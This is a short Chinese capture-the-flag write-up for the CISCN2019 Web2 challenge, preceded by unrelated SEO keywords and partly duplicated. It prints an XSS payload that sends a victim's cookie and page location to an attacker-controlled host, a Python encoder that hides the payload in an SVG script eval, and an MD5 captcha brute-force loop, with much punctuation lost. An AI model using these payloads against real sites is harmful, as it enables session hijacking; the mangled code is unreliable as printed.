多语言外贸网站制作,室内设计师招聘网站,2018做网站站长,2020站群seo系统[CISCN2019 华东北赛区]Web2
随便注册一个登录#xff0c;发现 还有反馈页面#xff0c;一看就知道大概率是xss#xff0c;应该是为了得到管理员cookie扫描了一下#xff0c;果然有admin.php后台登录 buu可以连接访问外网了#xff0c;所以内部的xss平台关闭了#xff0…[CISCN2019 华东北赛区]Web2
随便注册一个登录发现 还有反馈页面一看就知道大概率是xss应该是为了得到管理员cookie扫描了一下果然有admin.php后台登录 buu可以连接访问外网了所以内部的xss平台关闭了使用自己搭建的莲花平台不过需要一个服务器
自己搭建的xss平台使用
搭建
参考 https://blog.csdn.net/weixin_44652484/article/details/134169568 搭建非常简单
使用 根据其他人的题解 payload
xss(function(){window.location.hrefhttp://ip/xss_platform/?locationescape((function(){try{return document.location.href}catch(e){return }})())toplocationescape((function(){try{return top.location.href}catch(e){return }})())cookieescape((function(){try{return document.cookie}catch(e){return }})())openerescape((function(){try{return (window.opener window.opener.location.href)?window.opener.location.href:}catch(e){return }})());})();
output
for c in xss:
output # str(ord(c)) print(svgscripteval#40#34 output #34#41/script)然后提交文章得到连接来到反馈页面 说了要将域名改成web 验证码
import hashlib
numinput()
for i in range(999999,10000000):mhashlib.md5()m.update(str(i).encode())mm.hexdigest()if m[:6]num:print(i)break然后我得不到管理员的cookie啊算了反正思路是这样的有没有大佬知道为什么的得到phpsessid之后登录然后就是一个简单的sql注入
